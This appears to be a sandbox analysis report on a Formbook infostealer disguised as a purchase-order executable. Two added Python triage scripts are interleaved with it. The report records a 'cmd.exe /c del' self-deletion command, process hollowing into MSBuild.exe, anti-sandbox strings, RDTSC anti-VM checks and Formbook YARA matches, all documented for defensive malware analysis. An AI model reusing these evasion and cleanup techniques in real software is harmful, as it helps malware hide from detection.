          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015BDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015AD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01506E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B2EF7
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047E841F
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0489D466
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04802581
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A25DD
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047D0D20
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A2D07
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047ED5E0
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A1D55
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047F6E30
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A2EF7
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0489D616
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048ADFCE
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A1FF1
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048020A0
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A20A8
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047FA830
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A28EC
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04891002
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048AE824
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047EB090
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047F4120
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047DF900
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047F99BF
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A22AE
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0488FA2B
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0480EBB0
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_047FAB40
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048903DA
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0489DBD2
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048A2B28
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067C16E
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00668A40
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00668A3B
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067C52F
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00662D8A
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00662D90
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067BF03
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00662FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 014EB150 appears 136 times
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 047DB150 appears 72 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMARCUS.dll4 vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe | Binary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: *.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@16/11
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 40,7045$.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01
          Source: Purchase Order 40,7045$.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmpBinary or memory string: UPDATE [sms].[dbo].[person]set email=@email, street=@street, city=@city, district=@district, zip=@zip WHERE id=;Student Information updated!!
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Purchase Order 40,7045$.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase Order 40,7045$.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Purchase Order 40,7045$.exeStatic file information: File size 1269760 > 1048576
          Source: Purchase Order 40,7045$.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x135800
          Source: Purchase Order 40,7045$.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000001.00000002.289628195.00000000014C0000.00000040.00000001.sdmp, raserver.exe, 00000006.00000002.522839886.00000000047B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp
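The process-creation evidence above records the chain a triager cares about: the dropper on the user's Desktop starts the legitimate .NET binary MSBuild.exe with no real arguments (the sandbox renders that as `{path}`), later the system binary raserver.exe runs `cmd.exe /c del` against MSBuild.exe, i.e. the payload tries to erase the host image it was hollowed into. The script below is an added example, not code from the sandbox vendor or from this report. It parses the report's own "Process created" lines (copied into the script as constructed input) and applies two heuristics that are assumptions of this example, not the sandbox's scoring logic: a user-path parent starting an OS binary with an empty command line, and a `cmd /c del` whose target is the image of a process already seen in the run.

```python
"""Triage the 'Process created' evidence lines of a sandbox report.

Added example for this report; it is not code from the sandbox vendor or
from the report itself. REPORT_LINES is constructed input copied from the
report above. The path prefixes, the placeholder set and both heuristics
are assumptions of this example, not the sandbox's own scoring logic.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the process-creation evidence lines from this report.
REPORT_LINES = [
    r"Source: unknown; Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'",
    r"Source: unknown; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}",
    r"Source: unknown; Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe",
    r"Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'",
    r"Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}",
    r"Source: C:\Windows\SysWOW64\raserver.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'",
]

# 'Source: <parent>; Process created: <image>.exe <rest of command line>'.
# The image is taken up to the first '.exe' because image paths may contain spaces.
_LINE_RE = re.compile(
    r"^Source:\s*(?P<parent>.+?);\s*Process created:\s*(?P<image>.+?\.exe)(?:\s+(?P<cmdline>.*))?$",
    re.IGNORECASE,
)

USER_WRITABLE_PREFIXES = ("c:\\users\\",)   # assumption: where a phished dropper lands
OS_PREFIXES = ("c:\\windows\\",)            # assumption: where hollowing targets live
PLACEHOLDER_ARGS = {"", "{path}"}           # the sandbox renders an argument-less start as {path}


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process, or "unknown"
    image: str     # image path of the created process
    cmdline: str   # remaining command line as the sandbox rendered it


def parse_process_created(line: str) -> Optional[ProcEvent]:
    """Parse one evidence line; return None for lines of any other kind."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    return ProcEvent(m["parent"].strip(), m["image"].strip(), (m["cmdline"] or "").strip())


def _norm(path: str) -> str:
    """Case-fold a path and drop the quotes the sandbox puts around del targets."""
    return path.strip("'\"").lower()


def triage(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (rule, actor, subject) findings for the hollow-and-self-delete chain."""
    events = [e for e in map(parse_process_created, lines) if e]
    created_images = {_norm(e.image) for e in events}
    findings: List[Tuple[str, str, str]] = []
    for e in events:
        parent, image = _norm(e.parent), _norm(e.image)
        # Rule 1: a binary under a user-writable path starts an OS/framework binary
        # with no real arguments. A legitimate MSBuild run carries a project file;
        # an argument-less start is the usual prelude to process hollowing.
        if (parent.startswith(USER_WRITABLE_PREFIXES)
                and image.startswith(OS_PREFIXES)
                and e.cmdline in PLACEHOLDER_ARGS):
            findings.append(("hollowing_candidate", e.parent, e.image))
        # Rule 2: 'cmd.exe /c del <X>' where X is the image of a process already seen
        # in this run: the payload is erasing the host it ran from. When X is an OS
        # binary the del needs elevation to succeed, but the attempt is still evidence.
        if image.endswith("\\cmd.exe"):
            m = re.search(r"/c\s+del\s+(?P<target>['\"][^'\"]+['\"]|\S+)", e.cmdline, re.IGNORECASE)
            if m and _norm(m["target"]) in created_images:
                findings.append(("deletes_prior_process_image", e.parent, _norm(m["target"])))
    return findings


if __name__ == "__main__":
    for rule, actor, subject in triage(REPORT_LINES):
        print(f"{rule:28} actor={actor!r} subject={subject!r}")
```

Running it against the report's lines yields one `hollowing_candidate` (the Desktop dropper starting MSBuild.exe with `{path}`) and two `deletes_prior_process_image` findings, one with the parent unknown and one attributed to raserver.exe. A normal build invocation such as `MSBuild.exe MyApp.sln /t:Rebuild` from a user-path parent is not flagged, because the command line is not a placeholder.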

Data Obfuscation:

.NET source code contains potential unpacker
Source: Purchase Order 40,7045$.exe, a?opP?s???y/WD??v?aA?O.cs; .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Purchase Order 40,7045$.exe.810000.0.unpack, a?opP?s???y/WD??v?aA?O.cs; .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Code function: 0_2_0130DF50 push eax; ret 0_2_0130DF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_00415913 push edx; retf 1_2_00415915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_0041AC62 push D8D19732h; iretd 1_2_0041AC69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_00414D57 push esi; retf 1_2_00414D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_0041AD65 push eax; ret 1_2_0041ADB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_00414DEA push eax; ret 1_2_00414E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_0041ADB2 push eax; ret 1_2_0041ADB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_0041ADBB push eax; ret 1_2_0041AE22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_00414E7E push eax; ret 1_2_00414E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_0041AE1C push eax; ret 1_2_0041AE22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_00414E24 push eax; ret 1_2_00414E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_0040FF92 push 00000033h; iretd 1_2_0040FF98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 1_2_0153D0D1 push ecx; ret 1_2_0153D0E4
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_0482D0D1 push ecx; ret 6_2_0482D0E4
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_00675913 push edx; retf 6_2_00675915
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_0067AC62 push D8D19732h; iretd 6_2_0067AC69
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_0067AD65 push eax; ret 6_2_0067ADB8
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_00674D57 push esi; retf 6_2_00674D58
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_00674DEA push eax; ret 6_2_00674E32
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_0067ADB2 push eax; ret 6_2_0067ADB8
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_0067ADBB push eax; ret 6_2_0067AE22
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_00674E7E push eax; ret 6_2_00674E32
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_00674E24 push eax; ret 6_2_00674E32
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_0067AE1C push eax; ret 6_2_0067AE22
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 6_2_0066FF92 push 00000033h; iretd 6_2_0066FF98
Source: initial sample; Static PE information: section name: .text entropy: 7.30520133301
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe; Process information set: NOOPENFILEERRORBOX (32 identical events)
Source: C:\Windows\SysWOW64\raserver.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
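The "Code function" entries above are what the sandbox flags as inlined push/ret gadgets: `push X; ret` (or `retf`/`iretd`) transfers control to X without a `jmp` or `call`, so linear disassembly and simple control-flow recovery lose the target. Note also that the MSBuild.exe hits at 0x00415913, 0x0041AC62 and so on recur in raserver.exe at 0x00675913, 0x0067AC62, the same offsets from a different base, which is what one expects when the same unpacked payload is mapped into both hosts. The scanner below is an added example, not the sandbox's analysis code: it walks raw 32-bit x86 bytes and reports a push immediately followed by a return. It is stricter than the sandbox, which also pairs a push with a later ret reached by control flow (compare 1_2_0041AD65 push eax paired with the ret at 1_2_0041ADB8). The sample bytes are constructed from the instruction pairs listed in the report; they are not bytes taken from the sample.

```python
"""Scan raw x86 (32-bit) code bytes for 'push <x>; ret'-style stack-redirect gadgets.

Added example for this report, not the sandbox's own analysis code. The opcode
table is standard x86; SAMPLE is constructed from the instruction pairs listed
in the report's findings (not bytes from the sample). Only a push that is
immediately followed by a return is reported; a linear byte scan has no notion
of instruction boundaries, so treat hits as a density signal, not as proof.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Single-byte returns that end a push/ret gadget: ret (C3), retf (CB), iretd (CF).
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

# Constructed input mirroring the report's pairs, with filler bytes between them:
#   52 CB            push edx; retf
#   68 32 97 D1 D8 CF push D8D19732h; iretd
#   50 90            push eax; nop        (no return follows, must not be reported)
#   56 CB            push esi; retf
#   6A 33 CF         push 00000033h; iretd
#   51 C3            push ecx; ret
SAMPLE = bytes.fromhex("90 52 CB 8B 45 08 68 32 97 D1 D8 CF 50 90 56 CB 6A 33 CF 51 C3 C3")


@dataclass(frozen=True)
class Gadget:
    offset: int   # offset of the push within the buffer
    push: str     # decoded push mnemonic
    ret: str      # decoded return mnemonic

    @property
    def text(self) -> str:
        return f"{self.push}; {self.ret}"


def _decode_push(buf: bytes, i: int) -> Optional[Tuple[str, int]]:
    """Return (mnemonic, instruction length) if buf[i:] starts with a push, else None."""
    op = buf[i]
    if 0x50 <= op <= 0x57:                      # push r32 (one byte, register in low 3 bits)
        return f"push {REG32[op - 0x50]}", 1
    if op == 0x68 and i + 5 <= len(buf):        # push imm32
        imm = int.from_bytes(buf[i + 1:i + 5], "little")
        return f"push {imm:08X}h", 5
    if op == 0x6A and i + 2 <= len(buf):        # push imm8, sign-extended to 32 bits
        imm = buf[i + 1]
        if imm & 0x80:
            imm |= 0xFFFFFF00
        return f"push {imm:08X}h", 2
    return None


def find_push_ret_gadgets(buf: bytes) -> List[Gadget]:
    """Report every push whose next byte is a ret/retf/iretd opcode."""
    found: List[Gadget] = []
    for i in range(len(buf)):
        decoded = _decode_push(buf, i)
        if decoded is None:
            continue
        mnemonic, length = decoded
        j = i + length
        if j < len(buf) and buf[j] in RETURNS:
            found.append(Gadget(i, mnemonic, RETURNS[buf[j]]))
    return found


def gadgets_per_kib(buf: bytes) -> float:
    """Hit density; compiled code has very few adjacent push/ret pairs, obfuscated stubs many."""
    if not buf:
        return 0.0
    return len(find_push_ret_gadgets(buf)) * 1024 / len(buf)


if __name__ == "__main__":
    for g in find_push_ret_gadgets(SAMPLE):
        print(f"{g.offset:#06x}  {g.text}")
```

Pointing `find_push_ret_gadgets` at a dumped region such as the `1.2.MSBuild.exe.400000.0.unpack` image listed in the YARA section reproduces the kind of list the sandbox prints above; `gadgets_per_kib` is the number to compare against a clean build of the same host binary, since isolated `50 C3` byte pairs also occur as operands and immediates in ordinary code.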

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match; File source: 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Purchase Order 40,7045$.exe PID: 6708, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp; Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp; Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe; RDTSC instruction interceptor: First address: 00000000006683D4 second address: 00000000006683DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
